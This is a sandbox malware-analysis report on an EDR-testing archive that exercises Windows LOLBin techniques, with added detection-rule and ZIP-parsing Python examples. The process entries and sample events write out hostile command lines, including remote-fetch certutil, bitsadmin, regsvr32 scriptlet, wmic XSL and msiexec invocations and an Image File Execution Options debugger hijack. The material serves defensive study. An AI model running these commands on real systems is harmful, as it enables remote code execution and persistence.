File name:

EDR-Testing-Script-master.zip

Full analysis: https://app.any.run/tasks/3dbe3245-dc17-41a9-a701-d91fb16f5639
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims' computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. This is the sandbox's generic description for the "loader" tag; the submitted archive itself is a copy of the op7ic/EDR-Testing-Script repository (see the dropped-file paths under EDR-Testing-Script-master\Payloads\ and the raw.githubusercontent.com/op7ic/EDR-Testing-Script URL in the HTTP requests below), whose payload files are named for the LOLBin they exercise and for calc.exe (Mshta_calc.sct, Wmic_calc.xsl, Cmstp_calc.sct, calc.inf, calc-exec.sdb), and calc.exe is spawned repeatedly in the behavior graph. Read the signature hits below as the catalogue of techniques the script exercised on this host.

Analysis date: April 27, 2020, 21:56:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

F03CCDA7B91E985A10E2076D24E958E1

SHA1:

1E0C535824DFB0FDD8712451CC820C91ACA9C2C1

SHA256:

6BAA8B6173EBD62E3048C6247D5ABCCB23C76C84905C0FB94EB02B69F0B32B0A

SSDEEP:

12288:yrI4yJgeS2j/u6z2gpMP8Wf1RoNt0hvBT5UrrCX/OM:yraJJjfzT6P8WPv7Ur+PX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITSADMIN.EXE for downloading application

      • cmd.exe (PID: 2804)
      • cmd.exe (PID: 3944)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4004)
      • cmd.exe (PID: 2496)
    • Loads dropped or rewritten executable

      • InstallUtil.exe (PID: 1252)
      • RegSvcs.exe (PID: 3800)
      • RegAsm.exe (PID: 3568)
      • RegAsm.exe (PID: 3436)
      • RegSvcs.exe (PID: 2400)
      • netsh.exe (PID: 3488)
      • rundll32.exe (PID: 1888)
      • rundll32.exe (PID: 2244)
      • svchost.exe (PID: 860)
    • Changes settings of System certificates

      • mshta.exe (PID: 3996)
      • svchost.exe (PID: 860)
    • Uses WMIC.EXE to invoke remote XSL script

      • cmd.exe (PID: 3608)
    • Application was injected by another process

      • SearchProtocolHost.exe (PID: 1848)
      • qemu-ga.exe (PID: 1428)
      • svchost.exe (PID: 824)
      • SearchFilterHost.exe (PID: 4088)
      • SearchIndexer.exe (PID: 1120)
      • ctfmon.exe (PID: 652)
      • winlogon.exe (PID: 428)
      • OSPPSVC.EXE (PID: 3696)
      • dwm.exe (PID: 2044)
      • svchost.exe (PID: 1052)
      • svchost.exe (PID: 1804)
      • explorer.exe (PID: 372)
      • taskeng.exe (PID: 1984)
      • spoolsv.exe (PID: 1188)
      • svchost.exe (PID: 2196)
      • wmiprvse.exe (PID: 404)
      • svchost.exe (PID: 1216)
      • svchost.exe (PID: 860)
      • svchost.exe (PID: 756)
      • svchost.exe (PID: 668)
      • svchost.exe (PID: 796)
      • svchost.exe (PID: 592)
      • services.exe (PID: 472)
      • wininit.exe (PID: 380)
      • lsm.exe (PID: 492)
      • IMEDICTUPDATE.EXE (PID: 1364)
      • lsass.exe (PID: 484)
    • Runs injected code in another process

      • netsh.exe (PID: 2720)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3992)
      • cmd.exe (PID: 620)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2072)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3044)
    • Starts NET.EXE to view/change user groups

      • cmd.exe (PID: 3180)
      • cmd.exe (PID: 3092)
    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 3092)
    • Starts NET.EXE to view/change login properties

      • cmd.exe (PID: 3092)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3560)
      • cmd.exe (PID: 984)
    • Changes Image File Execution Options

      • reg.exe (PID: 696)
    • Starts Visual C# compiler

      • cmd.exe (PID: 2848)
      • cmd.exe (PID: 2532)
    • Changes the autorun value in the registry

      • rundll32.exe (PID: 772)
    • Actions look like stealing of personal data

      • explorer.exe (PID: 372)
    • Runs app for hidden code execution

      • cmd.exe (PID: 5652)
  • SUSPICIOUS

    • Creates files in the user directory

      • explorer.exe (PID: 372)
      • powershell.exe (PID: 940)
      • powershell.exe (PID: 3196)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3092)
      • explorer.exe (PID: 372)
      • MSBuild.exe (PID: 4060)
      • cmd.exe (PID: 5652)
    • Starts CertUtil to decode files

      • cmd.exe (PID: 1516)
      • cmd.exe (PID: 3312)
    • Creates files in the Windows directory

      • cmd.exe (PID: 3092)
      • certutil.exe (PID: 2184)
      • svchost.exe (PID: 860)
      • msdtc.exe (PID: 4032)
      • netsh.exe (PID: 2720)
      • certutil.exe (PID: 2900)
      • svchost.exe (PID: 756)
      • certutil.exe (PID: 3020)
      • certutil.exe (PID: 3076)
    • Removes files from Windows directory

      • certutil.exe (PID: 2184)
      • certutil.exe (PID: 2900)
      • certutil.exe (PID: 3020)
      • certutil.exe (PID: 3076)
    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2184)
      • cmd.exe (PID: 3092)
    • Creates or modifies windows services

      • services.exe (PID: 472)
    • Starts MSHTA.EXE for opening HTA or HTML files

      • cmd.exe (PID: 1900)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 3996)
      • regsvr32.exe (PID: 3980)
      • WMIC.exe (PID: 3772)
      • rundll32.exe (PID: 2344)
      • rundll32.exe (PID: 3212)
      • certutil.exe (PID: 2900)
      • cscript.exe (PID: 1604)
      • certutil.exe (PID: 3020)
      • hh.exe (PID: 4088)
    • Application launched itself

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 5652)
    • Executed as Windows Service

      • msdtc.exe (PID: 4032)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3996)
      • svchost.exe (PID: 860)
    • Uses NETSH.EXE for network configuration

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 2740)
      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 3192)
      • cmd.exe (PID: 3568)
      • cmd.exe (PID: 3436)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3760)
      • cmd.exe (PID: 3060)
      • cmd.exe (PID: 528)
      • cmd.exe (PID: 3840)
      • cmd.exe (PID: 3304)
      • cmd.exe (PID: 580)
      • control.exe (PID: 3932)
    • Reads internet explorer settings

      • rundll32.exe (PID: 3212)
      • rundll32.exe (PID: 2344)
      • hh.exe (PID: 4088)
    • Executes scripts

      • cmd.exe (PID: 780)
      • cmd.exe (PID: 3264)
      • cmd.exe (PID: 3128)
      • cmd.exe (PID: 3864)
    • Uses WMIC.EXE to obtain a system information

      • cmd.exe (PID: 3092)
    • Uses WHOAMI.EXE to obtain logged-on user information

      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 3200)
    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 3092)
    • Uses NETSTAT.EXE to discover network connections

      • cmd.exe (PID: 3092)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 2388)
      • cmd.exe (PID: 1848)
    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 3092)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3092)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 316)
      • cmd.exe (PID: 1908)
      • cmd.exe (PID: 3968)
      • cmd.exe (PID: 3424)
      • cmd.exe (PID: 5604)
    • Starts Internet Explorer

      • PresentationHost.exe (PID: 5916)
  • INFO

    • Manual execution by user

      • cmd.exe (PID: 3092)
    • Reads internet explorer settings

      • mshta.exe (PID: 3996)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3196)
      • svchost.exe (PID: 860)
    • Application launched itself

      • IEXPLORE.EXE (PID: 6028)
    • Reads Internet Cache Settings

      • IEXPLORE.EXE (PID: 4484)
      • IEXPLORE.EXE (PID: 6028)
    • Changes internet zones settings

      • IEXPLORE.EXE (PID: 6028)
    • Modifies the phishing filter of IE

      • IEXPLORE.EXE (PID: 6028)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
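The MALICIOUS and SUSPICIOUS entries above are signature names keyed to cmd.exe PIDs; the underlying command lines for a few of them appear under Process information (PIDs 256, 316 and 332). The block below is an added example, not ANY.RUN's code and not part of the EDR-Testing-Script project: a minimal rule set (an assumption written for this page, mapped to MITRE ATT&CK technique IDs) run over constructed sample events. Three of the events are the command lines this report shows verbatim; PIDs 9001-9007 are hypothetical and their URLs, apart from the CradleTest.txt one the report records, are constructed from the payload names in the archive.

```python
"""Command-line triage for the LOLBin behaviours this report flags.

Added example, not ANY.RUN's or the EDR-Testing-Script's code. RULES is a
minimal rule set written for this page (an assumption, not a product
signature database), keyed to the report's signature names and to MITRE
ATT&CK technique IDs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str        # behaviour, phrased like the report's signature names
    technique: str   # MITRE ATT&CK technique ID
    needs: tuple     # regexes that must ALL match the command line


RULES = (
    Rule("Uses BITSADMIN.EXE for downloading application", "T1197",
         (r"\bbitsadmin(\.exe)?\b", r"/(transfer|addfile)\b")),
    Rule("Starts CertUtil for downloading files", "T1105",
         (r"\bcertutil(\.exe)?\b", r"-urlcache\b", r"\bhttps?://")),
    Rule("Starts CertUtil to decode files", "T1140",
         (r"\bcertutil(\.exe)?\b", r"-decode(hex)?\b")),
    Rule("Changes Image File Execution Options", "T1546.012",
         (r"\breg(\.exe)?\s+add\b", r"image file execution options\\",
          r"/v\s+debugger\b")),
    Rule("Uses WMIC.EXE to invoke remote XSL script", "T1220",
         (r"\bwmic(\.exe)?\b", r"/format:\S*https?://")),
    Rule("Starts MSHTA.EXE for opening HTA or HTML files", "T1218.005",
         (r"\bmshta(\.exe)?\s+\S",)),
    Rule("Uses REGSVR32.EXE to run a remote scriptlet", "T1218.010",
         (r"\bregsvr32(\.exe)?\b", r"/i:\S*https?://", r"scrobj\.dll")),
    Rule("Uses Task Scheduler to autorun other applications", "T1053.005",
         (r"\bschtasks(\.exe)?\b", r"/create\b")),
    Rule("Uses Microsoft Installer as loader", "T1218.007",
         (r"\bmsiexec(\.exe)?\b", r"/(i|package)\b", r"https?://|/q[nb]?\b")),
    Rule("Copies a file from a remote share with ESENTUTL.EXE", "T1105",
         (r"\besentutl(\.exe)?\b", r"/y\s+\\\\")),
)


def classify(cmdline):
    """Return every Rule whose regexes all match cmdline (case-insensitive)."""
    return [r for r in RULES
            if all(re.search(p, cmdline, re.IGNORECASE) for p in r.needs)]


def triage(events):
    """events: iterable of (pid, cmdline) -> {pid: sorted technique IDs}, hits only."""
    hits = {}
    for pid, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits[pid] = sorted({r.technique for r in matched})
    return hits


# Constructed sample events (pid, command line). PIDs 256, 304, 316 and 332
# carry the command lines the report's Process information section shows for
# them; PIDs 9001-9007 are hypothetical and use the archive's payload names
# with constructed URLs (only the CradleTest.txt URL appears in the report).
SAMPLE_EVENTS = [
    (256, 'cscript //nologo "C:\\Windows\\System32\\winrm.vbs" qc -q'),
    (304, "timeout 5"),
    (316, 'cmd /c REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\'
          'Image File Execution Options\\paint.exe" /v Debugger /d "C:\\windows\\system32\\calc.exe"'),
    (332, "cmd /c esentutl.exe /y \\\\live.sysinternals.com\\tools\\adrestore.exe /d adrestore.exe /o"),
    (9001, "certutil.exe -urlcache -split -f http://raw.githubusercontent.com/op7ic/"
           "EDR-Testing-Script/master/Payloads/CradleTest.txt %TEMP%\\CradleTest.txt"),
    (9002, "certutil -decode %TEMP%\\payload.b64 %TEMP%\\payload.exe"),
    (9003, 'wmic os get /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"'),
    (9004, "regsvr32 /s /n /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct scrobj.dll"),
    (9005, 'schtasks /create /tn EDRTest /tr "C:\\Windows\\System32\\calc.exe" /sc once /st 00:00'),
    (9006, "msiexec /q /i https://github.com/op7ic/EDR-Testing-Script/raw/master/Payloads/notepad.msi"),
    (9007, "bitsadmin /transfer job /download /priority normal http://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt %TEMP%\\CradleTest.txt"),
]


if __name__ == "__main__":
    for pid, techniques in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(techniques))
```

Matching on the whole command line rather than on the image name is what catches the `cmd /c ...` wrappers that the report attributes to cmd.exe PIDs; `triage` keys hits by PID so the result joins back onto a process tree. The IFEO rule keys on `/v Debugger` deliberately: the report's own instance (PID 316) registers calc.exe as the debugger for paint.exe, which is the persistence shape T1546.012 describes. The winrm.vbs and timeout lines produce no hit, which is the intended behaviour of a rule set this narrow; widen it per environment rather than loosening the regexes.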
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2019:08:16 07:07:21
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: EDR-Testing-Script-master/
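The ZIP fields above (required version 10, no compression, zero CRC and sizes, a name ending in a slash) are just the first local file header of the archive, which here is the top-level directory entry, so they say nothing about the payload files that follow it. The block below is an added example, not ANY.RUN's code: it parses those fields from a constructed in-memory archive shaped like the sample (a directory entry named EDR-Testing-Script-master/ first, then one stored file) and walks on to the next header. The sample's own bytes are not reproduced; DOS timestamps hold even seconds only, so the constructed entry uses 07:07:20.

```python
"""Parse ZIP local file headers to recover the fields shown in the report's
EXIF/ZIP section (required version, compression, DOS timestamp, CRC, name).

Added example, not ANY.RUN's code. The archive is constructed in memory so
the block runs offline; it is shaped like the sample but is not its bytes.
"""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
# Local file header: sig, version needed, flags, method, time, date, crc,
# compressed size, uncompressed size, name length, extra length (30 bytes).
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")
COMPRESSION = {0: "None", 8: "Deflated", 12: "BZIP2", 14: "LZMA"}
FLAG_DATA_DESCRIPTOR = 0x0008


def dos_datetime(date, time):
    """Decode MS-DOS date/time words; seconds carry 2-second granularity."""
    return (((date >> 9) & 0x7F) + 1980, (date >> 5) & 0x0F, date & 0x1F,
            (time >> 11) & 0x1F, (time >> 5) & 0x3F, (time & 0x1F) * 2)


def parse_local_header(data, offset=0):
    """Return (fields, next_offset) for the local header at offset."""
    (sig, version, flags, method, mtime, mdate, crc, csize, usize,
     name_len, extra_len) = LOCAL_HEADER.unpack_from(data, offset)
    if sig != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    name_start = offset + LOCAL_HEADER.size
    name = data[name_start:name_start + name_len].decode("cp437")
    fields = {
        "ZipRequiredVersion": version,          # 10 -> "v1.0 to extract"
        "ZipBitFlag": flags,
        "ZipCompression": COMPRESSION.get(method, "method %d" % method),
        "ZipModifyDate": dos_datetime(mdate, mtime),
        "ZipCRC": crc,
        "ZipCompressedSize": csize,
        "ZipUncompressedSize": usize,
        "ZipFileName": name,
        "is_directory": name.endswith("/"),
    }
    if flags & FLAG_DATA_DESCRIPTOR:
        # Sizes live in a trailing data descriptor, so a linear walk cannot
        # find the next header; continue from the central directory instead.
        return fields, None
    return fields, name_start + name_len + extra_len + csize


def iter_local_headers(data):
    """Walk consecutive local headers from the start of the archive."""
    offset = 0
    while offset is not None and data[offset:offset + 4] == LOCAL_SIG:
        fields, offset = parse_local_header(data, offset)
        yield fields


def build_sample_archive():
    """Constructed archive: directory entry first, then one stored file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, payload in (("EDR-Testing-Script-master/", b""),
                              ("EDR-Testing-Script-master/README.md", b"# sample\n")):
            zi = zipfile.ZipInfo(name, date_time=(2019, 8, 16, 7, 7, 20))
            zi.extract_version = 10       # PKZIP 1.0 suffices for stored entries
            if name.endswith("/"):
                zi.external_attr = 0x10   # MS-DOS directory attribute
            zf.writestr(zi, payload)
    return buf.getvalue()


if __name__ == "__main__":
    for entry in iter_local_headers(build_sample_archive()):
        print(entry)
```

A directory entry with CRC 0 and both sizes 0 is normal, so the zero CRC in the report is not a sign of tampering. For triage of what the archive actually carries, iterate past the first header (or read the central directory) rather than stopping at the fields a metadata tool prints for entry one.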
No data.
All screenshots are available in the full report
Total processes
389
Monitored processes
285
Malicious processes
15
Suspicious processes
16

Behavior graph

The rendered graph is not reproduced here; its nodes are the executables below ("no specs" markers dropped).

Executables in the test run's process tree, in order of first appearance: winrar.exe, cmd.exe, timeout.exe, certutil.exe, bitsadmin.exe, powershell.exe, installutil.exe, mshta.exe, calc.exe, regsvcs.exe, msdtc.exe, regasm.exe, regsvr32.exe, msbuild.exe, wmic.exe, netsh.exe, rundll32.exe, cmstp.exe, forfiles.exe, cscript.exe, schtasks.exe, hostname.exe, ipconfig.exe, whoami.exe, net.exe, net1.exe, netstat.exe, tasklist.exe, sc.exe, systeminfo.exe, reg.exe, sdbinst.exe, msiexec.exe, esentutl.exe, replace.exe, hh.exe, runonce.exe, grpconv.exe, csc.exe, control.exe, presentationhost.exe, iexplore.exe.

Pre-existing system processes that appear in the graph as injection targets (the same set the report lists under "Application was injected by another process"): explorer.exe, wininit.exe, wmiprvse.exe, winlogon.exe, services.exe, lsass.exe, lsm.exe, svchost.exe, ctfmon.exe, searchindexer.exe, spoolsv.exe, imedictupdate.exe, qemu-ga.exe, searchprotocolhost.exe, taskeng.exe, dwm.exe, osppsvc.exe, searchfilterhost.exe.

Process information

Each entry gives PID, CMD, Path and Parent process, followed by the process details the report records.
PID: 256
CMD: cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q
Path: C:\Windows\system32\cscript.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
1
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
PID: 304
CMD: timeout 5
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
PID: 316
CMD: cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v Debugger /d "C:\windows\system32\calc.exe"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 332
CMD: cmd /c esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294967295
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 340
CMD: "C:\Windows\system32\runonce.exe" -r
Path: C:\Windows\system32\runonce.exe
Parent process: rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Run Once Wrapper
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\runonce.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 372
CMD: C:\Windows\Explorer.EXE
Path: C:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 380
CMD: wininit.exe
Path: C:\Windows\System32\wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Start-Up Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wininit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
PID: 404
CMD: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Path: C:\Windows\system32\wbem\wmiprvse.exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Provider Host
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\wbem\wmiprvse.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 428
CMD: winlogon.exe
Path: C:\Windows\System32\winlogon.exe
Parent process: explorer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Logon Application
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\winlogon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winsta.dll
PID: 472
CMD: C:\Windows\system32\services.exe
Path: C:\Windows\System32\services.exe
Parent process: wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Services and Controller app
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\services.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cryptbase.dll
Total events
8 071
Read events
5 703
Write events
2 366
Delete events
2

Modification events

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (372) explorer.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation: write
Name: a
Value: WinRAR.exe

(PID) Process: (372) explorer.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation: write
Name: MRUList
Value: a

(PID) Process: (372) explorer.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Operation: write
Name: WinRAR.ZIP
Value:

(PID) Process: (372) explorer.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\EDR-Testing-Script-master.zip

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3716) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80
Executable files
2
Suspicious files
43
Text files
120
Unknown types
27

Dropped files

All ten listed files were written by WinRAR.exe (PID 3716) when the archive was unpacked into C:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\; the report records no MD5, SHA256 or type for them. Paths relative to that directory:

  • Cobalt\EDR-TEST.CNA
  • LICENSE
  • Payloads\Cmstp.inf
  • Payloads\Cmstp_calc.sct
  • Payloads\CradleTest.txt
  • Payloads\Mshta_calc.sct
  • Payloads\Wmic_calc.xsl
  • Payloads\calc-exec.sdb
  • Payloads\calc.inf
  • Payloads\notepad.msi
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
22
DNS requests
16
Threats
2

HTTP requests

PID: 4088  Process: hh.exe
GET http://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt
HTTP code: 301  IP: 151.101.0.133:80  CN: US  Reputation: shared

PID: 1052  Process: svchost.exe
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
HTTP code: 200  IP: 2.18.233.62:80  CN: unknown  Type: der  Size: 813 b  Reputation: whitelisted

PID: 3996  Process: mshta.exe
GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D
HTTP code: 200  IP: 93.184.220.29:80  CN: US  Type: der  Size: 471 b  Reputation: whitelisted

Connections

(no PID/process recorded)  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 3996 mshta.exe  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 3996 mshta.exe  93.184.220.29:80  ocsp.digicert.com  ASN: MCI Communications Services, Inc. d/b/a Verizon Business  CN: US  Reputation: whitelisted
PID 3196 powershell.exe  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 3980 regsvr32.exe  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 3772 WMIC.exe  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 1604 cscript.exe  151.101.0.133:443  raw.githubusercontent.com  ASN: Fastly  CN: US  Reputation: malicious
PID 2600 msiexec.exe  140.82.118.3:443  github.com  CN: US  Reputation: malicious
PID 4 System  51.11.30.100:445  live.sysinternals.com  ASN: Microsoft Corporation  CN: GB  Reputation: suspicious
PID 3360 msiexec.exe  140.82.118.3:443  github.com  CN: US  Reputation: malicious

